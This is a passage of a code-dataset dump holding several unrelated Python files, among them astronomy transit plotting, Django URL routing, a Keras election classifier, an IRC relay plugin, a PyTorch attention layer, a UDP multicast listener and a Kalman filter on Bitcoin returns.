figure gets a name (or alternatively a number\n # if none is given), and gridspec creates an N*M grid onto which you can create axes for plots.\n # This returns a gridspec \"instance\" so you can specific which figure to put the axis on if you\n # have several on the go.\n plt.figure(name, figsize=(z*x, z*ratio*y))\n gs = gridspec.GridSpec(y, x, **kwargs)\n return gs\n\n\ntimes = np.loadtxt('v1v2_aperture_transit_times.txt')\ntimes = times[1:]\nt0 = 2454983.8617\np = 2.6940511\norbits = [1000, 1035, 1041, 1243, 1244]\nt_s = [2457772.20477, 2457788.36879]\ndt_s = [0.00021, 0.00027]\nt_ir = [57677.410708356 + 2400000.5]\nuvis_bjd_shifts = [8.645056709647179, 8.580875471234322]\n\ngs = gridcreate('123', 1, 2, 0.8, 5)\nax = plt.subplot(gs[0])\n\nfor i, (orbit, c) in enumerate(zip(orbits, ['k', 'k', 'k', 'k', 'r'])):\n if orbit < 1030:\n t_emp = t0 + orbit * p\n ax.plot(orbit, (t_ir[i] - t_emp)*24*60, c=c, marker='s')\n elif orbit < 1200:\n t_emp = t0 + orbit * p\n ax.errorbar(orbit, (t_s[i-1] - t_emp)*24*60, yerr=dt_s[i-1]*24*60, c=c, 
marker='s')\n else:\n t_emp = t0 + orbit * p\n t = times[:, 2*(i-3)+1] + 2400000.5\n dt = times[:, 2*(i-3)+2]\n ap = times[:, 0]\n ap_ms = (30-10) * (ap - np.amin(ap)) / (np.amax(ap) - np.amin(ap))\n ax.errorbar(np.ones_like(t)*orbit, (t - t_emp)*24*60 + uvis_bjd_shifts[i-3], yerr=dt*24*60, c=c, ls='None', marker='.')\n\nax.axhline(0, ls='-', c='k')\n_x = 1010\nax.text(_x, -1, 't0 = {}'.format(t0), fontsize=6)\nax.text(_x, -1.25, 'p = {}'.format(p), fontsize=6)\nax.text(_x, -1.5, 'orbit numbers = {}'.format(orbits), fontsize=6)\nax.text(_x, -1.75, 'Spitzer times = {} d'.format(t_s), fontsize=6)\nax.text(_x, -2, 'Spitzer uncertainties = {} d'.format(dt_s), fontsize=6)\nax.text(_x, -2.25, 'UVIS median times = [{}, {}] d'.format(np.percentile(times[:, 1], 50),\n np.percentile(times[:, 3], 50)),\n fontsize=6)\nax.text(_x, -2.5, 'UVIS median uncertainties = [{}, {}] d'.format(np.percentile(times[:, 2], 50),\n np.percentile(times[:, 4], 50)),\n fontsize=6)\nax.set_xlabel('Orbit Number')\nax.set_ylabel('O - C (mins)')\n\nax = plt.subplot(gs[1])\nfor i, c in enumerate(['k', 'r']):\n t_emp = t0 + orbits[i+3] * p\n t = times[:, 2*i+1] + 2400000.5\n dt = times[:, 2*i+2]\n ap = times[:, 0]\n ax.errorbar(ap, (t - t_emp)*24*60 + uvis_bjd_shifts[i], yerr=dt*24*60, c=c, ls='None',\n marker='.', label='V{}'.format(i+1))\nax.legend()\nax.set_xlabel('Aperture size')\nax.set_ylabel('O - C (min)')\n\nplt.tight_layout()\nplt.savefig('transit_times.pdf')\n","sub_path":"transit_times.py","file_name":"transit_times.py","file_ext":"py","file_size_in_byte":2891,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"181097994","text":"# from django.contrib import admin\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.urls import path\nfrom django.contrib.auth import views as auth_views\nfrom . 
import views\nfrom .views import (ListingListView,\n                    ListingDetailView,\n                    ListingCreateView,\n                    ListingUpdateView,\n                    ListingDeleteView,\n                    RequestListView,\n                    RequestDetailView,\n                    RequestCreateView,\n                    RequestUpdateView,\n                    RequestDeleteView,\n                    )\n\nurlpatterns = [\n    path('', views.home, name = 'flitting-home'),\n    path('register/', views.register, name = 'flitting-register'),\n    path('login/',auth_views.LoginView.as_view(template_name='flitting/login.html'), name='login'),\n    path('logout/',auth_views.LogoutView.as_view(template_name='flitting/logout.html'), name='logout'),\n    path('profile/',views.profile, name = \"flitting-profile\"),\n    path('team/', views.team, name = 'flitting-team'),\n    path('user/', views.user, name = 'flitting-user'),\n    path('about/', views.about, name = 'flitting-about'),\n    path('listing/', ListingListView.as_view(), name = 'listing-home'),\n    path('listing/<int:pk>/', ListingDetailView.as_view(), name = 'listing-detail'),\n    path('listing/new/', ListingCreateView.as_view(), name = 'listing-create'),\n    path('listing/<int:pk>/update/', ListingUpdateView.as_view(), name = 'listing-update'),\n    path('listing/<int:pk>/delete/', ListingDeleteView.as_view(), name = 'listing-delete'),\n    path('request/', RequestListView.as_view(), name = 'request-home'),\n    path('request/<int:pk>/', RequestDetailView.as_view(), name = 'request-detail'),\n    path('request/new/', RequestCreateView.as_view(success_url=\"/flitting/request/\"), name = 'request-create'),\n    path('request/<int:pk>/update/', RequestUpdateView.as_view(success_url=\"/flitting/request/\"), name = 'request-update'),\n    path('request/<int:pk>/delete/', RequestDeleteView.as_view(success_url=\"/flitting/request/\"), name = 'request-delete'),\n    path('request/search', views.RequestSearchList, name = 'request-search'),\n]\n\n\nif settings.DEBUG:\n    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"Flitting/flitting/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"28007442","text":"import tensorflow as tf\nfrom tensorflow import keras\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix\n#from keras.utils.vis_utils import plot_model\n\nnp.random.seed(100)\ntf.random.set_random_seed(94)\nnumber_train_epochs = 10000\n\n\nhouse = pd.read_pickle(\"./data/preprocessed_house.pkl\")\n\n# Make simple Preprocessing split\nX_train, X_test, y_train, y_test = train_test_split(house.loc[:, house.columns != \"winner\"], house[\"winner\"], test_size = 0.1, random_state = 100)\n\n# Basic Model\nmodel = keras.Sequential([keras.layers.Dense(40, activation=tf.nn.sigmoid),\n                          keras.layers.Dense(20, activation=tf.nn.sigmoid),\n                          keras.layers.Dense(2, activation=tf.nn.softmax)])\nmodel.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])\n\n\n\n# Perform Early Stopping Approach\n\n# 1st iteration\nmodel.fit(X_train.to_numpy(), y_train.to_numpy(), epochs=1)\ntrain_loss, train_acc = model.evaluate(X_train.to_numpy(), y_train.to_numpy())\ntest_loss, test_acc = model.evaluate(X_test.to_numpy(), y_test.to_numpy())\nloss_df = pd.DataFrame({'Training Loss':[train_loss],'Testing Loss':[test_loss]})\n\nmodel.save(\"./models/simple_%s.h5\" % number_train_epochs)\noptimal_model_test_loss = test_loss\noptimal_model_epoch_num = 0\n\nfor i in range(1, number_train_epochs): # Already performed 0th 
iteration\n # Backward propagate once, adjust weights\n model.fit(X_train.to_numpy(), y_train.to_numpy(), epochs=1)\n \n # Forward propagate to calculate new errors on training and testing\n train_loss, train_acc = model.evaluate(X_train.to_numpy(), y_train.to_numpy())\n test_loss, test_acc = model.evaluate(X_test.to_numpy(), y_test.to_numpy())\n new_loss = pd.DataFrame({'Training Loss':[train_loss],'Testing Loss':[test_loss]})\n loss_df = pd.concat([loss_df,new_loss]).reset_index(drop=True)\n \n if (test_loss < optimal_model_test_loss):\n print(\"Updating Optimal model at %dth iteration\" % i)\n model.save(\"./models/simple_%s.h5\" % number_train_epochs)\n optimal_model_test_loss = test_loss\n optimal_model_epoch_num = i\n\n# Plot the Training and Testing Errors over number of epochs\nepochs = tuple(range(number_train_epochs))\n\nfig = plt.figure()\n\nfig.suptitle(\"Loss on Normalized Data over Number of Propagations (Epochs)\")\n\nplt.subplot(1, 2, 1)\nplt.plot(epochs, loss_df[\"Training Loss\"])\nplt.axvline(x=optimal_model_epoch_num, color = 'black')\nplt.title('Training Loss over %d Epochs' % number_train_epochs)\nplt.xlabel('Epoch')\nplt.ylabel('Training Loss')\n\nplt.subplot(1, 2, 2)\nplt.plot(epochs, loss_df[\"Testing Loss\"], color = 'r')\nplt.axvline(x=optimal_model_epoch_num, color = 'black')\nplt.title('Testing Loss over %d Epochs' % number_train_epochs)\nplt.xlabel('Epoch')\nplt.ylabel('Training Loss')\n\nplt.savefig(\"./plots/Simple_Loss_%s.png\" % number_train_epochs)\nplt.show()\n\n\n# Examine Error\noptimal_model = keras.models.load_model(\"./models/simple_%s.h5\" % number_train_epochs)\n\ntest_loss, test_acc = optimal_model.evaluate(X_test.to_numpy(), y_test.to_numpy())\nprint('Quick testing accuracy:', test_acc)\n\n# Confusion Matricies\nclassify_pred = lambda x: x > 0.5\n\ntest_predictions = optimal_model.predict(X_test.to_numpy())\ny_test_pred = classify_pred(test_predictions[:,1])\ntest_cm = confusion_matrix(y_test.to_numpy(), y_test_pred)\nprint(\"Testing Confustion Matrix:\\n\", test_cm)\n\ntrain_predictions = optimal_model.predict(X_train.to_numpy())\ny_train_pred = classify_pred(train_predictions[:,1])\ntrain_cm = confusion_matrix(y_train.to_numpy(), y_train_pred)\nprint(\"Training Confustion Matrix:\\n\", train_cm)\n\n\n# Plot Predictions and actual results on a 2D plot of Total Contributions vs Operating Expenditures\nplt.clf()\nfig = plt.figure()\nfig.suptitle(\"Real Election Outcomes vs Simple Predicted Model of Simple Test Set\")\n\nplt.subplot(1, 2, 1)\nplt.scatter(X_test[\"ope_exp\"][y_test], X_test[\"net_con\"][y_test], alpha = 0.5, label = \"Election Win\")\nplt.scatter(X_test[\"ope_exp\"][~y_test], X_test[\"net_con\"][~y_test], color = 'r', alpha = 0.5, label = \"Election Loss\")\nplt.title('Actual Testing Set')\nplt.xlabel('Operating Expenditures')\nplt.ylabel('Net Contributions')\nplt.legend()\n\nplt.subplot(1, 2, 2)\nplt.scatter(X_test[\"ope_exp\"][y_test_pred], X_test[\"net_con\"][y_test_pred], alpha = 0.5, label = \"Predicted Election Win\")\nplt.scatter(X_test[\"ope_exp\"][~y_test_pred], X_test[\"net_con\"][~y_test_pred], color = 'r', alpha = 0.5, label = \"Predicted Election Loss\")\nplt.title('Neural Network Predictions of Testing Set')\nplt.xlabel('Operating Expenditures')\nplt.ylabel('Net Contributions')\nplt.legend()\n\nplt.savefig(\"./plots/Simple_Classifications_%s.png\" % number_train_epochs)\n\nincorrect_pred = np.array(y_test_pred != y_test)\n\nplt.clf()\nplt.scatter(X_test[\"ope_exp\"][incorrect_pred], 
X_test[\"net_con\"][incorrect_pred], alpha = 0.5, color = 'r')\nplt.title('Misclassified Data Points by Normalized ANN of Simple Test Set')\nplt.xlabel('Operating Expenditures')\nplt.ylabel('Net Contributions')\nplt.show()\nplt.savefig(\"./plots/Simple_Misclassified_%s.png\" % number_train_epochs)\n","sub_path":"01_Simple.py","file_name":"01_Simple.py","file_ext":"py","file_size_in_byte":5192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"48807539","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.stats as stats\nimport random\nfrom numpy import loadtxt,savetxt,zeros\nimport math\nimport seaborn as sns\nfrom scipy import interpolate\nfrom scipy.interpolate import interp2d\n\ni=1\ncc='2'\ncomp=11\n\nsclass=[0.0103,0.266,1,3]\n\ndef s_classification(s):\n ans=np.zeros(len(s))\n for i in range(len(s)):\n if s[i]<=0.266:\n ans[i]=4\n elif s[i]<=1 and s[i]>0.266:\n ans[i]=3\n elif s[i]<=3 and s[i]>1:\n ans[i]=2\n elif s[i]>3:\n ans[i]=1\n return ans\nll=[]\ny=[]\nfor i in range(34):\n y.append(np.loadtxt(open('y_split%d'%(i+1),\"rb\"),delimiter=\" \",skiprows=0)[:,11])\n ll.append(np.loadtxt(open('l_split%d'%(i+1),\"rb\"),delimiter=\" \",skiprows=0)[:,2])\n \ny= np.asarray(y)\nl=np.asarray(ll)\ny=np.reshape(y,[y.shape[0]*y.shape[1],1])\naa=s_classification(y)\nl=np.reshape(l,[y.shape[0]*y.shape[1],1])\n#np.savetxt('ss_con',aa)\n#np.savetxt('ss_local',l)\ns3=aa==3\ns4=aa==4\nfin1=l[s4]\nsns.distplot(fin1)\ns1=aa==1\ns2=aa==2\nfin2=l[s3]\nsns.distplot(fin2)\nnp.savetxt('s4.txt',fin1)\nnp.savetxt('s3.txt',fin2)\n\n","sub_path":"map_data/type_con.py","file_name":"type_con.py","file_ext":"py","file_size_in_byte":1125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"435731800","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.6 (62161)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/otfbot/plugins/ircServer/human.py\n# Compiled at: 2011-04-22 06:35:42\nfrom twisted.internet import protocol, reactor\nfrom twisted.words.protocols import irc\nfrom twisted.words import service\nfrom twisted.protocols import basic\nfrom otfbot.lib import chatMod\nfrom otfbot.lib.pluginSupport.decorators import callback\nimport string\n\ndef sendNames(server, network, channel):\n getClient = lambda network: server.root.getServiceNamed('ircClient').namedServices[network].factory.protocol\n if network in server.root.getServiceNamed('ircClient').namedServices.keys():\n ircClient = server.root.getServiceNamed('ircClient')\n users = ircClient.namedServices[network].factory.protocol.getUsers(channel)\n names = [ user.nick for user in users ]\n server.names(server.name, '#' + network + '-' + channel, names)\n\n\nclass Plugin(chatMod.chatMod):\n\n def __init__(self, server):\n server.depends_on_service('ircClient')\n self.server = server\n self.mychannels = []\n self.first = True\n self.getClient = lambda network: server.root.getServiceNamed('ircClient').getServiceNamed(network).protocol\n self.getClientNames = lambda : [ connection.name for connection in self.server.root.getServiceNamed('ircClient').services ]\n self.server.registerCallback(self, 'irc_NICK')\n self.server.registerCallback(self, 'irc_PRIVMSG')\n self.server.registerCallback(self, 'irc_JOIN')\n self.server.registerCallback(self, 'irc_PART')\n\n @callback\n def irc_NICK(self, prefix, params):\n if not self.first:\n return\n if not 
self.server.loggedon:\n return\n self.first = False\n for network in self.getClientNames():\n bot = self.getClient(network)\n for channel in bot.channels:\n self.server.join(self.server.getHostmask(), '#' + network + '-' + channel)\n sendNames(self.server, network, channel)\n self.mychannels.append('#' + network + '-' + channel)\n\n @callback\n def irc_PRIVMSG(self, prefix, params):\n if params[0][0] == '#':\n if params[0] in self.mychannels:\n (network, channel) = params[0][1:].split('-', 1)\n self.getClient(network).sendmsg(channel, params[1])\n elif '-' in params[0]:\n (network, nick) = params[0].split('-', 1)\n self.getClient(network).sendmsg(nick, params[1])\n\n @callback\n def irc_JOIN(self, prefix, params):\n try:\n (network, channel) = params[0][1:].split('-', 1)\n if network in self.getClientNames():\n if len(params) >= 2:\n self.server.root.getServiceNamed('config').set('password', params[1], 'main', network, channel)\n self.getClient(network).join(channel, params[1])\n else:\n self.getClient(network).join(channel)\n self.server.join(self.server.getHostmask(), '#%s-%s' % (network, channel))\n if channel in self.getClient(network).users.keys():\n sendNames(self.server, network, channel)\n self.mychannels.append('#%s-%s' % (network, channel))\n except ValueError:\n pass\n\n @callback\n def irc_PART(self, prefix, params):\n try:\n (network, channel) = params[0][1:].split('-', 1)\n if network in self.getClientNames():\n self.getClient(network).part(channel)\n self.server.part(self.server.getHostmask(), '#%s-%s' % (network, channel))\n self.mychannels.remove('#%s-%s' % (network, channel))\n except ValueError:\n pass","sub_path":"pycfiles/otfbot-1.0.0-py2.6/human.py","file_name":"human.py","file_ext":"py","file_size_in_byte":3880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"366393935","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('assets', '0005_assetholder'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='BudgetInfo',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),\n ('name', models.CharField(verbose_name='name', max_length=255, unique=True)),\n ('created', models.DateTimeField(verbose_name='date created', auto_now=True)),\n ('modified', models.DateTimeField(verbose_name='last modified', auto_now_add=True)),\n ],\n options={\n 'verbose_name_plural': 'Budgets info',\n 'verbose_name': 'Budget info',\n },\n ),\n migrations.AddField(\n model_name='asset',\n name='budget_info',\n field=models.ForeignKey(null=True, to='assets.BudgetInfo', blank=True, on_delete=django.db.models.deletion.PROTECT, default=None),\n ),\n ]\n","sub_path":"src/ralph/assets/migrations/0006_auto_20151110_1448.py","file_name":"0006_auto_20151110_1448.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"414812475","text":"# printing the number of digits present in a given number\nnum_str = input(\"Enter a number: \")\nnum = int(num_str)\n# print(type(num))\n# print(len(num))\nx = len(num_str)\n\n\n# initialize sum\nsum = 0\n\n# find the sum of the cube of each digit\ntemp = num\nwhile temp > 0:\n digit = temp % 10\n sum += digit ** x\n temp //= 10\n\n# display the result\nif num == sum:\n print(num, \"is an Armstrong 
number\")\nelse:\n print(num, \"is not an Armstrong number\")\n","sub_path":"Basic python codes/ArmstrongFinal.py","file_name":"ArmstrongFinal.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"325618506","text":"import unittest\nimport os\nimport sys\nfrom . import autoparse\nfrom . import constants as c\n\n\ntry:\n from pylib.config.config import read_config\nexcept ModuleNotFoundError as e:\n thisdir = os.path.dirname(__file__)\n homepath = os.path.abspath( os.path.join(thisdir, '..'))\n sys.path.append(homepath)\n from config.config import read_config \n\nCONFIG_FILE = os.path.abspath(os.path.join(\n os.path.dirname(__file__), \"test\", \"test_config.json\"))\nconfig = read_config(CONFIG_FILE)\n\nclass TestArg(unittest.TestCase):\n def test_valid_config(self):\n args = autoparse.config_parser(config)\n self.assertEqual(args.testarg, \"default value\")\n\n def test_invalid_config(self):\n with self.assertRaises(ValueError):\n autoparse.config_parser({})\n\n def test_null_config(self):\n d = {c.ARGPARSE_SECTION_KEY:{}}\n args = autoparse.config_parser(d)\n self.assertEqual(args, {})\n\n\nif __name__=='__main__':\n unittest.main()\n","sub_path":"pylib/autoparse/test_autoparse.py","file_name":"test_autoparse.py","file_ext":"py","file_size_in_byte":979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"489815218","text":"import argparse\nimport json\nimport os\nfrom tqdm import tqdm\n# 3rd party imports\nimport spacy\nimport neuralcoref\nimport sys\nfrom collections import defaultdict\nfrom main02_parse_articles import parse_article\nfrom main03_get_parse_data import extract_pdata\nfrom main04_compute_auth import combine_auth, compute_statement_auth\nimport pandas as pd\n\npd.options.mode.chained_assignment = None # default='warn'\n\nclass Pipeline():\n\tdef __init__(self, args):\n\t\tself.args = args\n\t\tos.makedirs(self.args.output_directory, exist_ok=True)\n\t\tself.nlp = spacy.load('en_core_web_sm', disable=[\"ner\"])\n\t\tneuralcoref.add_to_pipe(self.nlp)\n\n\tdef parse_articles(self):\n\t\tfor filename in tqdm(os.listdir(args.input_directory)):\n\t\t\tparse_article(filename, self.nlp, self.args)\n\n\tdef extract_parsed_data(self):\n\t\textract_pdata(self.args)\n\n\tdef compute_authority_measures(self):\n\t\tchunks = os.listdir(os.path.join(self.args.output_directory, \"03_pdata\"))\n\t\tchunks = sorted(chunks, key=lambda x: int(x.split(\"_\")[-1][:-4]))\n\t\tfor filename in tqdm(chunks):\n\t\t\tfilepath = os.path.join(self.args.output_directory, \"03_pdata\", filename)\n\t\t\tcur_df = pd.read_pickle(filepath)\n\t\t\tcompute_statement_auth(self.args, cur_df, filename)\n\t\tcombine_auth(self.args)\n\n\tdef run_main(self):\n\t\t# dependency parsing\n\t\tos.makedirs(os.path.join(self.args.output_directory, \"02_parsed_articles\"), exist_ok=True)\n\t\tself.parse_articles()\n\n\t\t# extract necessary parsed information\n\t\tos.makedirs(os.path.join(self.args.output_directory, \"03_pdata\"), exist_ok=True)\n\t\tself.extract_parsed_data()\n\n\t\tos.makedirs(os.path.join(self.args.output_directory, \"04_auth\"), exist_ok=True)\n\n\t\t# compute authority measures for chunks\n\t\tself.compute_authority_measures()\n\n\n\t\t\nif __name__ == \"__main__\":\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"--input_directory\", type=str, default=\"\")\n\tparser.add_argument(\"--output_directory\", type=str, default=\"\")\n\targs = 
parser.parse_args()\n\tpipeline = Pipeline(args)\n\tpipeline.run_main()\n\n\n","sub_path":"src/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":1980,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"211850515","text":"import torch\nimport torch.nn as nn\nimport sys\nfrom torch.autograd import Variable\n\nclass Attention(nn.Module):\n\n    def __init__(self, hidden_dim):\n        super(Attention, self).__init__()\n        self.hidden_dim = hidden_dim\n        \"\"\"\n        self.attn = nn.Sequential(\n            nn.Linear(self.hidden_dim*2, 1, bias=True),\n            nn.Softmax()\n        )\n        \"\"\"\n        self.linear1 = nn.Linear(self.hidden_dim*2, 1, bias=False)\n        self.softmax = nn.Softmax(dim=2)\n\n\n    def forward(self, hidden, encoder_output, device):\n        concatenated_attn = torch.cat((hidden, encoder_output), dim=2).to(device)\n        #attn_weights = self.attn(concatenated_attn)\n        batch_size = concatenated_attn.size()[1]\n        concatenated_attn = concatenated_attn.view(-1, concatenated_attn.size()[2])\n        attn_weights = self.linear1(concatenated_attn)\n        attn_weights = attn_weights.view(-1, batch_size, 1)\n        attn_weights = torch.transpose(attn_weights, 0, 2)\n        attn_weights = torch.transpose(attn_weights, 0, 1)\n        attn_weights = self.softmax(attn_weights)\n        #print(attn_weights.size())\n        #print(attn_weights)\n        encoder_output = torch.transpose(encoder_output, 0, 1)\n        #attn_hidden = Variable(torch.bmm(attn_weights.type(torch.FloatTensor).to(device), encoder_output.type(torch.FloatTensor))).to(device)\n        attn_hidden = torch.bmm(attn_weights, encoder_output)\n        attn_hidden = Variable(torch.squeeze(attn_hidden)).to(device)\n        #attn_hidden = torch.squeeze(attn_hidden)\n        return attn_hidden\n","sub_path":"model/attn.py","file_name":"attn.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"106717642","text":"#\n# https://www.cnblogs.com/lsdb/p/9408947.html\n#\n\nimport sys\nimport struct\nimport time\nimport socket\n\n# On Linux we can bind to a NIC, so binding to the multicast IP here does not error; Windows cannot bind to a NIC, so there we can only bind to the local interface IP instead of the multicast IP\nif \"linux\" in sys.platform:\n    # Name of the NIC to bind to; be sure to change this if yours is not eth0\n    nic_name = b\"ens37\"\n    # Multicast group address to listen on\n    mcast_group_ip = \"239.255.255.250\"\nelse:\n    mcast_group_ip = socket.gethostbyname(socket.gethostname())\nmcast_group_port = 1900\n\ndef receiver():\n    # Create the receiving socket; no different from a normal UDP socket\n    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)\n    # 25 is the value of the SO_BINDTODEVICE macro on Linux; since Windows does not implement SO_BINDTODEVICE, Python does not expose it there, so the raw value 25 can be used directly\n    # Windows does not implement SO_BINDTODEVICE, so binding to a NIC this way is not possible there; how to bind a NIC on Windows is unclear\n    if \"linux\" in sys.platform:\n        sock.setsockopt(socket.SOL_SOCKET, socket.SO_BINDTODEVICE, nic_name)\n    # On Linux we can bind to a NIC, so binding to the multicast IP here does not error; Windows cannot bind to a NIC, so there we can only bind to the local interface IP instead of the multicast IP\n    sock.bind((mcast_group_ip, mcast_group_port))\n    # Join the multicast group\n    mreq = struct.pack(\"=4sl\", socket.inet_aton(mcast_group_ip), socket.INADDR_ANY)\n    sock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)\n\n    # Allow port reuse; many tutorials include this but its purpose here is unclear, so it is commented out\n    # sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n    # Set non-blocking; also common in tutorials but of unclear benefit here, so it is commented out\n    # sock.setblocking(0)\n    while True:\n        try:\n            message, addr = sock.recvfrom(1024)\n            print(f'\\033[0;32m{time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())}: Receive data from {addr}: \\033[0m\\n{message.decode()}')\n        except KeyboardInterrupt:\n            break\n        except Exception as e:\n            print(f\"error occurred while receiving message: {type(e)}\")\n\n\nif __name__ == \"__main__\":\n    
receiver()","sub_path":"python/network/udp_group_multicast_server.py","file_name":"udp_group_multicast_server.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"303490182","text":"import numpy as np\nfrom filtering import *\nfrom smoother import *\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nfrom class_p import *\n\ndf = pd.read_csv(r'/Users/paulcalvetti/Documents/internship/exos/btcusd_15m/bctusd_15m_all.csv')\ndf['time'] = pd.to_datetime(df['time'])\ndf.sort_values(by = 'time', inplace=True)\ndf.set_index('time')\n\nidx = (df.time >= '2015-02-20') & (df.time <= '2015-03-01')\n#df2 = df[df['time'] > '2016-01-01' and df['time'] < '2017-01-01' ]\ndf2 = df[idx]\nprint('here df2',df2)\n\n\n\n\nV = np.array([df2['log return'].tolist()])\n#print(np.shape(V))\nplt.plot(df2.time,V[0])\nplt.xticks(rotation=70)\nplt.title(\"BTCUSD Log Returns\")\nplt.show()\nmean_val = np.mean(V)\nprint('mean_val',mean_val)\nS = 4\nT=np.size(V)\n\n\nmu1h = np.empty(shape = [S,1],dtype = object)\nmu1h[0] = np.array([[mean_val]])\nmu1h[1] = np.array([[mean_val]])\nmu1h[2] = np.array([[mean_val]])\nmu1h[3] = np.array([[mean_val]])\n\nsig0v_low = .000005\nsig0v_high = .0001\nsig0v = [sig0v_low,sig0v_high,sig0v_low, sig0v_high]\n\n\nsig1h_low = .000000001\nsig1h_high = .00001\n\nsig1h = np.empty(shape = [S,1,1],dtype = object)\nsig1h[0] = np.array([[sig1h_low]])\nsig1h[1] = np.array([[sig1h_low]])\nsig1h[2] = np.array([[sig1h_high]])\nsig1h[3] = np.array([[sig1h_high]])\n\nsig0h_low = .000000001\nsig0h_high = .00001\n\nsig0h = np.empty(shape = [S,1,1], dtype = object)\n\nsig0h[0] = np.array([[sig0h_low]])\nsig0h[1] = np.array([[sig0h_low]])\nsig0h[2] = np.array([[sig0h_high]])\nsig0h[3] = np.array([[sig0h_high]])\n\n\n\npstgstm1ctm1 = np.empty(shape = [S,S,2])\npstgstm1ctm1[:,:,0] = np.array([[0.97, .01, .01, .01],[.01,.97, .01, .01],[.01,.01,.97, .01],[.01,.01,.01,.97]])\npstgstm1ctm1[:,:,1] = np.array([[1, 1.0000e-06, 1.0000e-06, 1.0000e-06],[1.0000e-06, 1, 1.0000e-06,1.0000e-06],[1.0000e-06, 1.0000e-06, 1,1.0000e-06],[1.0000e-06, 1.0000e-06, 1.0000e-06,1]])\n\n\n\n\n\n\n\n\nB0 = np.array([[1], [1], [1],[1]])\nmu0v = [0, 0, 0,0]\n\n\n\nmu0h = np.empty(shape = [S,1],dtype = object)\nmu0h[0] = np.array([[0]])\nmu0h[1] = np.array([[0]])\nmu0h[2] = np.array([[0]])\nmu0h[3] = np.array([[0]])\n\n\n\n\n\n\n\n\n\n\nA = np.empty(shape = [S,1,1], dtype = object)\n\nA[0] = np.array([[1]])\nA[1] = np.array([[1]])\nA[2] = np.array([[1]])\nA[3] = np.array([[1]])\n\nB1 = np.empty(shape = [S,1],dtype = object)\nB1[0] = np.array([[1]])\nB1[1] = np.array([[1]])\nB1[2] = np.array([[1]])\nB1[3] = np.array([[1]])\n\nmu1v = np.zeros(S)\nsig1v = np.array([.00001,.00001,.00001,.00001])\n\n\n\n\n\n\n\n\n\n\nps1 = np.array([[1/S, 1/S, 1/S,1/S]])\n\n\nmuh1 = np.empty(shape = [S,1],dtype = object)\nmuh1[0] = np.array([[0]])\nmuh1[1] = np.array([[0]])\nmuh1[2] = np.array([[0]])\nmuh1[3] = np.array([[0]])\n\nsigh1 = np.empty(shape = [S,1,1])\nsigh1[0] = np.array([[.000001]])\nsigh1[1] = np.array([[.0000001]])\nsigh1[2] = np.array([[.0000001]])\nsigh1[3] = np.array([[.0000001]])\n\n\n\n\n\n\n\n\np = P(B0, mu0v,sig0v,mu0h,sig0h,A,B1,mu1v,sig1v,mu1h,sig1h,pstgstm1ctm1,ps1,muh1,sigh1)\n\nf, F, w, alpha, loglik, reset_prob = filtering(p,V,5)\n\ns0 =[]\ns1=[]\ns2=[]\ns3=[]\nfor t in range(T):\n s0.append(sum(w[t][0]))\n s1.append(sum(w[t][1]))\n s2.append(sum(w[t][2]))\n 
